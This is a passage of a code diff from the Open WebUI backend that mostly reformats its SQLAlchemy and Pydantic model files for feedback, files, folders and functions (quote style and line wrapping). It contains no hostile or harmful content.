db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: db.query(ChatFile).filter_by(chat_id=chat_id, file_id=file_id).delete() @@ -1703,9 +1538,7 @@ def delete_chat_file( except Exception: return False - def get_shared_chats_by_file_id( - self, file_id: str, db: Optional[Session] = None - ) -> list[ChatModel]: + def get_shared_chats_by_file_id(self, file_id: str, db: Optional[Session] = None) -> list[ChatModel]: with get_db_context(db) as db: # Join Chat and ChatFile tables to get shared chats associated with the file_id all_chats = (
backend/open_webui/models/feedbacks.py+53 −94 modified@@ -19,7 +19,7 @@ class Feedback(Base): - __tablename__ = "feedback" + __tablename__ = 'feedback' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text) version = Column(BigInteger, default=0) @@ -81,35 +81,35 @@ class RatingData(BaseModel): sibling_model_ids: Optional[list[str]] = None reason: Optional[str] = None comment: Optional[str] = None - model_config = ConfigDict(extra="allow", protected_namespaces=()) + model_config = ConfigDict(extra='allow', protected_namespaces=()) class MetaData(BaseModel): arena: Optional[bool] = None chat_id: Optional[str] = None message_id: Optional[str] = None tags: Optional[list[str]] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class SnapshotData(BaseModel): chat: Optional[dict] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class FeedbackForm(BaseModel): type: str data: Optional[RatingData] = None meta: Optional[dict] = None snapshot: Optional[SnapshotData] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class UserResponse(BaseModel): id: str name: str email: str - role: str = "pending" + role: str = 'pending' last_active_at: int # timestamp in epoch updated_at: int # timestamp in epoch @@ -146,12 +146,12 @@ def insert_new_feedback( id = str(uuid.uuid4()) feedback = FeedbackModel( **{ - "id": id, - "user_id": user_id, - "version": 0, + 'id': id, + 'user_id': user_id, + 'version': 0, **form_data.model_dump(), - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) try: @@ -164,12 +164,10 @@ def insert_new_feedback( else: return None except Exception as e: - log.exception(f"Error creating a new feedback: {e}") + log.exception(f'Error creating a new feedback: {e}') return None - def get_feedback_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[FeedbackModel]: + def get_feedback_by_id(self, id: str, db: Optional[Session] = None) -> Optional[FeedbackModel]: try: with get_db_context(db) as db: feedback = db.query(Feedback).filter_by(id=id).first() @@ -191,16 +189,14 @@ def get_feedback_by_id_and_user_id( except Exception: return None - def get_feedbacks_by_chat_id( - self, chat_id: str, db: Optional[Session] = None - ) -> list[FeedbackModel]: + def get_feedbacks_by_chat_id(self, chat_id: str, db: Optional[Session] = None) -> list[FeedbackModel]: """Get all feedbacks for a specific chat.""" try: with get_db_context(db) as db: # meta.chat_id stores the chat reference feedbacks = ( db.query(Feedback) - .filter(Feedback.meta["chat_id"].as_string() == chat_id) + .filter(Feedback.meta['chat_id'].as_string() == chat_id) .order_by(Feedback.created_at.desc()) .all() ) @@ -219,36 +215,28 @@ def get_feedback_items( query = db.query(Feedback, User).join(User, Feedback.user_id == User.id) if filter: - order_by = filter.get("order_by") - direction = filter.get("direction") + order_by = filter.get('order_by') + direction = filter.get('direction') - if order_by == "username": - if direction == "asc": + if order_by == 'username': + if direction == 'asc': query = query.order_by(User.name.asc()) else: query = query.order_by(User.name.desc()) - elif order_by == "model_id": + elif order_by == 'model_id': # it's stored in feedback.data['model_id'] - if direction == "asc": - query = query.order_by( - Feedback.data["model_id"].as_string().asc() - ) + if direction == 'asc': + query = query.order_by(Feedback.data['model_id'].as_string().asc()) else: - query = query.order_by( - Feedback.data["model_id"].as_string().desc() - ) - elif order_by == "rating": + query = query.order_by(Feedback.data['model_id'].as_string().desc()) + elif order_by == 'rating': # it's stored in feedback.data['rating'] - if direction == "asc": - query = query.order_by( - Feedback.data["rating"].as_string().asc() - ) + if direction == 'asc': + query = query.order_by(Feedback.data['rating'].as_string().asc()) else: - query = query.order_by( - Feedback.data["rating"].as_string().desc() - ) - elif order_by == "updated_at": - if direction == "asc": + query = query.order_by(Feedback.data['rating'].as_string().desc()) + elif order_by == 'updated_at': + if direction == 'asc': query = query.order_by(Feedback.updated_at.asc()) else: query = query.order_by(Feedback.updated_at.desc()) @@ -270,24 +258,18 @@ def get_feedback_items( for feedback, user in items: feedback_model = FeedbackModel.model_validate(feedback) user_model = UserResponse.model_validate(user) - feedbacks.append( - FeedbackUserResponse(**feedback_model.model_dump(), user=user_model) - ) + feedbacks.append(FeedbackUserResponse(**feedback_model.model_dump(), user=user_model)) return FeedbackListResponse(items=feedbacks, total=total) def get_all_feedbacks(self, db: Optional[Session] = None) -> list[FeedbackModel]: with get_db_context(db) as db: return [ FeedbackModel.model_validate(feedback) - for feedback in db.query(Feedback) - .order_by(Feedback.updated_at.desc()) - .all() + for feedback in db.query(Feedback).order_by(Feedback.updated_at.desc()).all() ] - def get_all_feedback_ids( - self, db: Optional[Session] = None - ) -> list[FeedbackIdResponse]: + def get_all_feedback_ids(self, db: Optional[Session] = None) -> list[FeedbackIdResponse]: with get_db_context(db) as db: return [ FeedbackIdResponse( @@ -306,14 +288,11 @@ def get_all_feedback_ids( .all() ] - def get_feedbacks_for_leaderboard( - self, db: Optional[Session] = None - ) -> list[LeaderboardFeedbackData]: + def get_feedbacks_for_leaderboard(self, db: Optional[Session] = None) -> list[LeaderboardFeedbackData]: """Fetch only id and data for leaderboard computation (excludes snapshot/meta).""" with get_db_context(db) as db: return [ - LeaderboardFeedbackData(id=row.id, data=row.data) - for row in db.query(Feedback.id, Feedback.data).all() + LeaderboardFeedbackData(id=row.id, data=row.data) for row in db.query(Feedback.id, Feedback.data).all() ] def get_model_evaluation_history( @@ -333,30 +312,26 @@ def get_model_evaluation_history( rows = db.query(Feedback.created_at, Feedback.data).all() else: cutoff = int(time.time()) - (days * 86400) - rows = ( - db.query(Feedback.created_at, Feedback.data) - .filter(Feedback.created_at >= cutoff) - .all() - ) + rows = db.query(Feedback.created_at, Feedback.data).filter(Feedback.created_at >= cutoff).all() - daily_counts = defaultdict(lambda: {"won": 0, "lost": 0}) + daily_counts = defaultdict(lambda: {'won': 0, 'lost': 0}) first_date = None for created_at, data in rows: if not data: continue - if data.get("model_id") != model_id: + if data.get('model_id') != model_id: continue - rating_str = str(data.get("rating", "")) - if rating_str not in ("1", "-1"): + rating_str = str(data.get('rating', '')) + if rating_str not in ('1', '-1'): continue - date_str = datetime.fromtimestamp(created_at).strftime("%Y-%m-%d") - if rating_str == "1": - daily_counts[date_str]["won"] += 1 + date_str = datetime.fromtimestamp(created_at).strftime('%Y-%m-%d') + if rating_str == '1': + daily_counts[date_str]['won'] += 1 else: - daily_counts[date_str]["lost"] += 1 + daily_counts[date_str]['lost'] += 1 # Track first date for this model if first_date is None or date_str < first_date: @@ -368,7 +343,7 @@ def get_model_evaluation_history( if days == 0 and first_date: # All time: start from first feedback date - start_date = datetime.strptime(first_date, "%Y-%m-%d").date() + start_date = datetime.strptime(first_date, '%Y-%m-%d').date() num_days = (today - start_date).days + 1 else: # Fixed range @@ -377,36 +352,24 @@ def get_model_evaluation_history( for i in range(num_days): d = start_date + timedelta(days=i) - date_str = d.strftime("%Y-%m-%d") - counts = daily_counts.get(date_str, {"won": 0, "lost": 0}) - result.append( - ModelHistoryEntry(date=date_str, won=counts["won"], lost=counts["lost"]) - ) + date_str = d.strftime('%Y-%m-%d') + counts = daily_counts.get(date_str, {'won': 0, 'lost': 0}) + result.append(ModelHistoryEntry(date=date_str, won=counts['won'], lost=counts['lost'])) return result - def get_feedbacks_by_type( - self, type: str, db: Optional[Session] = None - ) -> list[FeedbackModel]: + def get_feedbacks_by_type(self, type: str, db: Optional[Session] = None) -> list[FeedbackModel]: with get_db_context(db) as db: return [ FeedbackModel.model_validate(feedback) - for feedback in db.query(Feedback) - .filter_by(type=type) - .order_by(Feedback.updated_at.desc()) - .all() + for feedback in db.query(Feedback).filter_by(type=type).order_by(Feedback.updated_at.desc()).all() ] - def get_feedbacks_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[FeedbackModel]: + def get_feedbacks_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[FeedbackModel]: with get_db_context(db) as db: return [ FeedbackModel.model_validate(feedback) - for feedback in db.query(Feedback) - .filter_by(user_id=user_id) - .order_by(Feedback.updated_at.desc()) - .all() + for feedback in db.query(Feedback).filter_by(user_id=user_id).order_by(Feedback.updated_at.desc()).all() ] def update_feedback_by_id( @@ -462,9 +425,7 @@ def delete_feedback_by_id(self, id: str, db: Optional[Session] = None) -> bool: db.commit() return True - def delete_feedback_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_feedback_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: feedback = db.query(Feedback).filter_by(id=id, user_id=user_id).first() if not feedback: @@ -473,9 +434,7 @@ def delete_feedback_by_id_and_user_id( db.commit() return True - def delete_feedbacks_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> bool: + def delete_feedbacks_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: result = db.query(Feedback).filter_by(user_id=user_id).delete() db.commit()
backend/open_webui/models/files.py+39 −79 modified@@ -16,7 +16,7 @@ class File(Base): - __tablename__ = "file" + __tablename__ = 'file' id = Column(String, primary_key=True, unique=True) user_id = Column(String) hash = Column(Text, nullable=True) @@ -58,24 +58,22 @@ class FileMeta(BaseModel): content_type: Optional[str] = None size: Optional[int] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') - @model_validator(mode="before") + @model_validator(mode='before') @classmethod def sanitize_meta(cls, data): """Sanitize metadata fields to handle malformed legacy data.""" if not isinstance(data, dict): return data # Handle content_type that may be a list like ['application/pdf', None] - content_type = data.get("content_type") + content_type = data.get('content_type') if isinstance(content_type, list): # Extract first non-None string value - data["content_type"] = next( - (item for item in content_type if isinstance(item, str)), None - ) + data['content_type'] = next((item for item in content_type if isinstance(item, str)), None) elif content_type is not None and not isinstance(content_type, str): - data["content_type"] = None + data['content_type'] = None return data @@ -92,7 +90,7 @@ class FileModelResponse(BaseModel): created_at: int # timestamp in epoch updated_at: Optional[int] = None # timestamp in epoch, optional for legacy files - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class FileMetadataResponse(BaseModel): @@ -123,25 +121,22 @@ class FileUpdateForm(BaseModel): meta: Optional[dict] = None - class FilesTable: - def insert_new_file( - self, user_id: str, form_data: FileForm, db: Optional[Session] = None - ) -> Optional[FileModel]: + def insert_new_file(self, user_id: str, form_data: FileForm, db: Optional[Session] = None) -> Optional[FileModel]: with get_db_context(db) as db: file_data = form_data.model_dump() # Sanitize meta to remove non-JSON-serializable objects # (e.g. callable tool functions, MCP client instances from middleware) - if file_data.get("meta"): - file_data["meta"] = sanitize_metadata(file_data["meta"]) + if file_data.get('meta'): + file_data['meta'] = sanitize_metadata(file_data['meta']) file = FileModel( **{ **file_data, - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) @@ -155,12 +150,10 @@ def insert_new_file( else: return None except Exception as e: - log.exception(f"Error inserting a new file: {e}") + log.exception(f'Error inserting a new file: {e}') return None - def get_file_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[FileModel]: + def get_file_by_id(self, id: str, db: Optional[Session] = None) -> Optional[FileModel]: try: with get_db_context(db) as db: try: @@ -171,9 +164,7 @@ def get_file_by_id( except Exception: return None - def get_file_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[FileModel]: + def get_file_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[FileModel]: with get_db_context(db) as db: try: file = db.query(File).filter_by(id=id, user_id=user_id).first() @@ -184,9 +175,7 @@ def get_file_by_id_and_user_id( except Exception: return None - def get_file_metadata_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[FileMetadataResponse]: + def get_file_metadata_by_id(self, id: str, db: Optional[Session] = None) -> Optional[FileMetadataResponse]: with get_db_context(db) as db: try: file = db.get(File, id) @@ -204,9 +193,7 @@ def get_files(self, db: Optional[Session] = None) -> list[FileModel]: with get_db_context(db) as db: return [FileModel.model_validate(file) for file in db.query(File).all()] - def check_access_by_user_id( - self, id, user_id, permission="write", db: Optional[Session] = None - ) -> bool: + def check_access_by_user_id(self, id, user_id, permission='write', db: Optional[Session] = None) -> bool: file = self.get_file_by_id(id, db=db) if not file: return False @@ -215,21 +202,14 @@ def check_access_by_user_id( # Implement additional access control logic here as needed return False - def get_files_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> list[FileModel]: + def get_files_by_ids(self, ids: list[str], db: Optional[Session] = None) -> list[FileModel]: with get_db_context(db) as db: return [ FileModel.model_validate(file) - for file in db.query(File) - .filter(File.id.in_(ids)) - .order_by(File.updated_at.desc()) - .all() + for file in db.query(File).filter(File.id.in_(ids)).order_by(File.updated_at.desc()).all() ] - def get_file_metadatas_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> list[FileMetadataResponse]: + def get_file_metadatas_by_ids(self, ids: list[str], db: Optional[Session] = None) -> list[FileMetadataResponse]: with get_db_context(db) as db: return [ FileMetadataResponse( @@ -239,30 +219,23 @@ def get_file_metadatas_by_ids( created_at=file.created_at, updated_at=file.updated_at, ) - for file in db.query( - File.id, File.hash, File.meta, File.created_at, File.updated_at - ) + for file in db.query(File.id, File.hash, File.meta, File.created_at, File.updated_at) .filter(File.id.in_(ids)) .order_by(File.updated_at.desc()) .all() ] - def get_files_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[FileModel]: + def get_files_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[FileModel]: with get_db_context(db) as db: - return [ - FileModel.model_validate(file) - for file in db.query(File).filter_by(user_id=user_id).all() - ] + return [FileModel.model_validate(file) for file in db.query(File).filter_by(user_id=user_id).all()] def get_file_list( self, user_id: Optional[str] = None, skip: int = 0, limit: int = 50, db: Optional[Session] = None, - ) -> "FileListResponse": + ) -> 'FileListResponse': with get_db_context(db) as db: query = db.query(File) if user_id: @@ -272,10 +245,7 @@ def get_file_list( items = [ FileModel.model_validate(file) - for file in query.order_by(File.updated_at.desc(), File.id.desc()) - .offset(skip) - .limit(limit) - .all() + for file in query.order_by(File.updated_at.desc(), File.id.desc()).offset(skip).limit(limit).all() ] return FileListResponse(items=items, total=total) @@ -296,17 +266,17 @@ def _glob_to_like_pattern(glob: str) -> str: A SQL LIKE compatible pattern with proper escaping. """ # Escape SQL special characters first, then convert glob wildcards - pattern = glob.replace("\\", "\\\\") - pattern = pattern.replace("%", "\\%") - pattern = pattern.replace("_", "\\_") - pattern = pattern.replace("*", "%") - pattern = pattern.replace("?", "_") + pattern = glob.replace('\\', '\\\\') + pattern = pattern.replace('%', '\\%') + pattern = pattern.replace('_', '\\_') + pattern = pattern.replace('*', '%') + pattern = pattern.replace('?', '_') return pattern def search_files( self, user_id: Optional[str] = None, - filename: str = "*", + filename: str = '*', skip: int = 0, limit: int = 100, db: Optional[Session] = None, @@ -331,15 +301,12 @@ def search_files( query = query.filter_by(user_id=user_id) pattern = self._glob_to_like_pattern(filename) - if pattern != "%": - query = query.filter(File.filename.ilike(pattern, escape="\\")) + if pattern != '%': + query = query.filter(File.filename.ilike(pattern, escape='\\')) return [ FileModel.model_validate(file) - for file in query.order_by(File.created_at.desc(), File.id.desc()) - .offset(skip) - .limit(limit) - .all() + for file in query.order_by(File.created_at.desc(), File.id.desc()).offset(skip).limit(limit).all() ] def update_file_by_id( @@ -362,12 +329,10 @@ def update_file_by_id( db.commit() return FileModel.model_validate(file) except Exception as e: - log.exception(f"Error updating file completely by id: {e}") + log.exception(f'Error updating file completely by id: {e}') return None - def update_file_hash_by_id( - self, id: str, hash: Optional[str], db: Optional[Session] = None - ) -> Optional[FileModel]: + def update_file_hash_by_id(self, id: str, hash: Optional[str], db: Optional[Session] = None) -> Optional[FileModel]: with get_db_context(db) as db: try: file = db.query(File).filter_by(id=id).first() @@ -379,9 +344,7 @@ def update_file_hash_by_id( except Exception: return None - def update_file_data_by_id( - self, id: str, data: dict, db: Optional[Session] = None - ) -> Optional[FileModel]: + def update_file_data_by_id(self, id: str, data: dict, db: Optional[Session] = None) -> Optional[FileModel]: with get_db_context(db) as db: try: file = db.query(File).filter_by(id=id).first() @@ -390,12 +353,9 @@ def update_file_data_by_id( db.commit() return FileModel.model_validate(file) except Exception as e: - return None - def update_file_metadata_by_id( - self, id: str, meta: dict, db: Optional[Session] = None - ) -> Optional[FileModel]: + def update_file_metadata_by_id(self, id: str, meta: dict, db: Optional[Session] = None) -> Optional[FileModel]: with get_db_context(db) as db: try: file = db.query(File).filter_by(id=id).first()
backend/open_webui/models/folders.py+28 −44 modified@@ -20,7 +20,7 @@ class Folder(Base): - __tablename__ = "folder" + __tablename__ = 'folder' id = Column(Text, primary_key=True, unique=True) parent_id = Column(Text, nullable=True) user_id = Column(Text) @@ -72,14 +72,14 @@ class FolderForm(BaseModel): data: Optional[dict] = None meta: Optional[dict] = None parent_id: Optional[str] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class FolderUpdateForm(BaseModel): name: Optional[str] = None data: Optional[dict] = None meta: Optional[dict] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class FolderTable: @@ -94,12 +94,12 @@ def insert_new_folder( id = str(uuid.uuid4()) folder = FolderModel( **{ - "id": id, - "user_id": user_id, + 'id': id, + 'user_id': user_id, **(form_data.model_dump(exclude_unset=True) or {}), - "parent_id": parent_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'parent_id': parent_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) try: @@ -112,7 +112,7 @@ def insert_new_folder( else: return None except Exception as e: - log.exception(f"Error inserting a new folder: {e}") + log.exception(f'Error inserting a new folder: {e}') return None def get_folder_by_id_and_user_id( @@ -137,9 +137,7 @@ def get_children_folders_by_id_and_user_id( folders = [] def get_children(folder): - children = self.get_folders_by_parent_id_and_user_id( - folder.id, user_id, db=db - ) + children = self.get_folders_by_parent_id_and_user_id(folder.id, user_id, db=db) for child in children: get_children(child) folders.append(child) @@ -153,14 +151,9 @@ def get_children(folder): except Exception: return None - def get_folders_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[FolderModel]: + def get_folders_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[FolderModel]: with get_db_context(db) as db: - return [ - FolderModel.model_validate(folder) - for folder in db.query(Folder).filter_by(user_id=user_id).all() - ] + return [FolderModel.model_validate(folder) for folder in db.query(Folder).filter_by(user_id=user_id).all()] def get_folder_by_parent_id_and_user_id_and_name( self, @@ -184,7 +177,7 @@ def get_folder_by_parent_id_and_user_id_and_name( return FolderModel.model_validate(folder) except Exception as e: - log.error(f"get_folder_by_parent_id_and_user_id_and_name: {e}") + log.error(f'get_folder_by_parent_id_and_user_id_and_name: {e}') return None def get_folders_by_parent_id_and_user_id( @@ -193,9 +186,7 @@ def get_folders_by_parent_id_and_user_id( with get_db_context(db) as db: return [ FolderModel.model_validate(folder) - for folder in db.query(Folder) - .filter_by(parent_id=parent_id, user_id=user_id) - .all() + for folder in db.query(Folder).filter_by(parent_id=parent_id, user_id=user_id).all() ] def update_folder_parent_id_by_id_and_user_id( @@ -219,7 +210,7 @@ def update_folder_parent_id_by_id_and_user_id( return FolderModel.model_validate(folder) except Exception as e: - log.error(f"update_folder: {e}") + log.error(f'update_folder: {e}') return def update_folder_by_id_and_user_id( @@ -241,7 +232,7 @@ def update_folder_by_id_and_user_id( existing_folder = ( db.query(Folder) .filter_by( - name=form_data.get("name"), + name=form_data.get('name'), parent_id=folder.parent_id, user_id=user_id, ) @@ -251,25 +242,25 @@ def update_folder_by_id_and_user_id( if existing_folder and existing_folder.id != id: return None - folder.name = form_data.get("name", folder.name) - if "data" in form_data: + folder.name = form_data.get('name', folder.name) + if 'data' in form_data: folder.data = { **(folder.data or {}), - **form_data["data"], + **form_data['data'], } - if "meta" in form_data: + if 'meta' in form_data: folder.meta = { **(folder.meta or {}), - **form_data["meta"], + **form_data['meta'], } folder.updated_at = int(time.time()) db.commit() return FolderModel.model_validate(folder) except Exception as e: - log.error(f"update_folder: {e}") + log.error(f'update_folder: {e}') return def update_folder_is_expanded_by_id_and_user_id( @@ -289,12 +280,10 @@ def update_folder_is_expanded_by_id_and_user_id( return FolderModel.model_validate(folder) except Exception as e: - log.error(f"update_folder: {e}") + log.error(f'update_folder: {e}') return - def delete_folder_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> list[str]: + def delete_folder_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> list[str]: try: folder_ids = [] with get_db_context(db) as db: @@ -306,11 +295,8 @@ def delete_folder_by_id_and_user_id( # Delete all children folders def delete_children(folder): - folder_children = self.get_folders_by_parent_id_and_user_id( - folder.id, user_id, db=db - ) + folder_children = self.get_folders_by_parent_id_and_user_id(folder.id, user_id, db=db) for folder_child in folder_children: - delete_children(folder_child) folder_ids.append(folder_child.id) @@ -323,12 +309,12 @@ def delete_children(folder): db.commit() return folder_ids except Exception as e: - log.error(f"delete_folder: {e}") + log.error(f'delete_folder: {e}') return [] def normalize_folder_name(self, name: str) -> str: # Replace _ and space with a single space, lower case, collapse multiple spaces - name = re.sub(r"[\s_]+", " ", name) + name = re.sub(r'[\s_]+', ' ', name) return name.strip().lower() def search_folders_by_names( @@ -349,9 +335,7 @@ def search_folders_by_names( results[folder.id] = FolderModel.model_validate(folder) # get children folders - children = self.get_children_folders_by_id_and_user_id( - folder.id, user_id, db=db - ) + children = self.get_children_folders_by_id_and_user_id(folder.id, user_id, db=db) for child in children: results[child.id] = child
backend/open_webui/models/functions.py+52 −97 modified@@ -16,7 +16,7 @@ class Function(Base): - __tablename__ = "function" + __tablename__ = 'function' id = Column(String, primary_key=True, unique=True) user_id = Column(String) @@ -30,13 +30,13 @@ class Function(Base): updated_at = Column(BigInteger) created_at = Column(BigInteger) - __table_args__ = (Index("is_global_idx", "is_global"),) + __table_args__ = (Index('is_global_idx', 'is_global'),) class FunctionMeta(BaseModel): description: Optional[str] = None manifest: Optional[dict] = {} - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') class FunctionModel(BaseModel): @@ -113,10 +113,10 @@ def insert_new_function( function = FunctionModel( **{ **form_data.model_dump(), - "user_id": user_id, - "type": type, - "updated_at": int(time.time()), - "created_at": int(time.time()), + 'user_id': user_id, + 'type': type, + 'updated_at': int(time.time()), + 'created_at': int(time.time()), } ) @@ -131,7 +131,7 @@ def insert_new_function( else: return None except Exception as e: - log.exception(f"Error creating a new function: {e}") + log.exception(f'Error creating a new function: {e}') return None def sync_functions( @@ -156,16 +156,16 @@ def sync_functions( db.query(Function).filter_by(id=func.id).update( { **func.model_dump(), - "user_id": user_id, - "updated_at": int(time.time()), + 'user_id': user_id, + 'updated_at': int(time.time()), } ) else: new_func = Function( **{ **func.model_dump(), - "user_id": user_id, - "updated_at": int(time.time()), + 'user_id': user_id, + 'updated_at': int(time.time()), } ) db.add(new_func) @@ -177,27 +177,20 @@ def sync_functions( db.commit() - return [ - FunctionModel.model_validate(func) - for func in db.query(Function).all() - ] + return [FunctionModel.model_validate(func) for func in db.query(Function).all()] except Exception as e: - log.exception(f"Error syncing functions for user {user_id}: {e}") + log.exception(f'Error syncing functions for user {user_id}: {e}') return [] - def get_function_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[FunctionModel]: + def get_function_by_id(self, id: str, db: Optional[Session] = None) -> Optional[FunctionModel]: try: with get_db_context(db) as db: function = db.get(Function, id) return FunctionModel.model_validate(function) except Exception: return None - def get_functions_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> list[FunctionModel]: + def get_functions_by_ids(self, ids: list[str], db: Optional[Session] = None) -> list[FunctionModel]: """ Batch fetch multiple functions by their IDs in a single query. Returns functions in the same order as the input IDs (None entries filtered out). @@ -225,18 +218,11 @@ def get_functions( functions = db.query(Function).all() if include_valves: - return [ - FunctionWithValvesModel.model_validate(function) - for function in functions - ] + return [FunctionWithValvesModel.model_validate(function) for function in functions] else: - return [ - FunctionModel.model_validate(function) for function in functions - ] + return [FunctionModel.model_validate(function) for function in functions] - def get_function_list( - self, db: Optional[Session] = None - ) -> list[FunctionUserResponse]: + def get_function_list(self, db: Optional[Session] = None) -> list[FunctionUserResponse]: with get_db_context(db) as db: functions = db.query(Function).order_by(Function.updated_at.desc()).all() user_ids = list(set(func.user_id for func in functions)) @@ -248,69 +234,48 @@ def get_function_list( FunctionUserResponse.model_validate( { **FunctionModel.model_validate(func).model_dump(), - "user": ( - users_dict.get(func.user_id).model_dump() - if func.user_id in users_dict - else None - ), + 'user': (users_dict.get(func.user_id).model_dump() if func.user_id in users_dict else None), } ) for func in functions ] - def get_functions_by_type( - self, type: str, active_only=False, db: Optional[Session] = None - ) -> list[FunctionModel]: + def get_functions_by_type(self, type: str, active_only=False, db: Optional[Session] = None) -> list[FunctionModel]: with get_db_context(db) as db: if active_only: return [ FunctionModel.model_validate(function) - for function in db.query(Function) - .filter_by(type=type, is_active=True) - .all() + for function in db.query(Function).filter_by(type=type, is_active=True).all() ] else: return [ - FunctionModel.model_validate(function) - for function in db.query(Function).filter_by(type=type).all() + FunctionModel.model_validate(function) for function in db.query(Function).filter_by(type=type).all() ] - def get_global_filter_functions( - self, db: Optional[Session] = None - ) -> list[FunctionModel]: + def get_global_filter_functions(self, db: Optional[Session] = None) -> list[FunctionModel]: with get_db_context(db) as db: return [ FunctionModel.model_validate(function) - for function in db.query(Function) - .filter_by(type="filter", is_active=True, is_global=True) - .all() + for function in db.query(Function).filter_by(type='filter', is_active=True, is_global=True).all() ] - def get_global_action_functions( - self, db: Optional[Session] = None - ) -> list[FunctionModel]: + def get_global_action_functions(self, db: Optional[Session] = None) -> list[FunctionModel]: with get_db_context(db) as db: return [ FunctionModel.model_validate(function) - for function in db.query(Function) - .filter_by(type="action", is_active=True, is_global=True) - .all() + for function in db.query(Function).filter_by(type='action', is_active=True, is_global=True).all() ] - def get_function_valves_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[dict]: + def get_function_valves_by_id(self, id: str, db: Optional[Session] = None) -> Optional[dict]: with get_db_context(db) as db: try: function = db.get(Function, id) return function.valves if function.valves else {} except Exception as e: - log.exception(f"Error getting function valves by id {id}: {e}") + log.exception(f'Error getting function valves by id {id}: {e}') return None - def get_function_valves_by_ids( - self, ids: list[str], db: Optional[Session] = None - ) -> dict[str, dict]: + def get_function_valves_by_ids(self, ids: list[str], db: Optional[Session] = None) -> dict[str, dict]: """ Batch fetch valves for multiple functions in a single query. Returns a dict mapping function_id -> valves dict. @@ -320,14 +285,10 @@ def get_function_valves_by_ids( return {} try: with get_db_context(db) as db: - functions = ( - db.query(Function.id, Function.valves) - .filter(Function.id.in_(ids)) - .all() - ) + functions = db.query(Function.id, Function.valves).filter(Function.id.in_(ids)).all() return {f.id: (f.valves if f.valves else {}) for f in functions} except Exception as e: - log.exception(f"Error batch-fetching function valves: {e}") + log.exception(f'Error batch-fetching function valves: {e}') return {} def update_function_valves_by_id( @@ -364,25 +325,23 @@ def update_function_metadata_by_id( else: return None except Exception as e: - log.exception(f"Error updating function metadata by id {id}: {e}") + log.exception(f'Error updating function metadata by id {id}: {e}') return None - def get_user_valves_by_id_and_user_id( - self, id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[dict]: + def get_user_valves_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> Optional[dict]: try: user = Users.get_user_by_id(user_id, db=db) user_settings = user.settings.model_dump() if user.settings else {} # Check if user has "functions" and "valves" settings - if "functions" not in user_settings: - user_settings["functions"] = {} - if "valves" not in user_settings["functions"]: - user_settings["functions"]["valves"] = {} + if 'functions' not in user_settings: + user_settings['functions'] = {} + if 'valves' not in user_settings['functions']: + user_settings['functions']['valves'] = {} - return user_settings["functions"]["valves"].get(id, {}) + return user_settings['functions']['valves'].get(id, {}) except Exception as e: - log.exception(f"Error getting user values by id {id} and user id {user_id}") + log.exception(f'Error getting user values by id {id} and user id {user_id}') return None def update_user_valves_by_id_and_user_id( @@ -393,32 +352,28 @@ def update_user_valves_by_id_and_user_id( user_settings = user.settings.model_dump() if user.settings else {} # Check if user has "functions" and "valves" settings - if "functions" not in user_settings: - user_settings["functions"] = {} - if "valves" not in user_settings["functions"]: - user_settings["functions"]["valves"] = {} + if 'functions' not in user_settings: + user_settings['functions'] = {} + if 'valves' not in user_settings['functions']: + user_settings['functions']['valves'] = {} - user_settings["functions"]["valves"][id] = valves + user_settings['functions']['valves'][id] = valves # Update the user settings in the database - Users.update_user_by_id(user_id, {"settings": user_settings}, db=db) + Users.update_user_by_id(user_id, {'settings': user_settings}, db=db) - return user_settings["functions"]["valves"][id] + return user_settings['functions']['valves'][id] except Exception as e: - log.exception( - f"Error updating user valves by id {id} and user_id {user_id}: {e}" - ) + log.exception(f'Error updating user valves by id {id} and user_id {user_id}: {e}') return None - def update_function_by_id( - self, id: str, updated: dict, db: Optional[Session] = None - ) -> Optional[FunctionModel]: + def update_function_by_id(self, id: str, updated: dict, db: Optional[Session] = None) -> Optional[FunctionModel]: with get_db_context(db) as db: try: db.query(Function).filter_by(id=id).update( { **updated, - "updated_at": int(time.time()), + 'updated_at': int(time.time()), } ) db.commit() @@ -432,8 +387,8 @@ def deactivate_all_functions(self, db: Optional[Session] = None) -> Optional[boo try: db.query(Function).update( { - "is_active": False, - "updated_at": 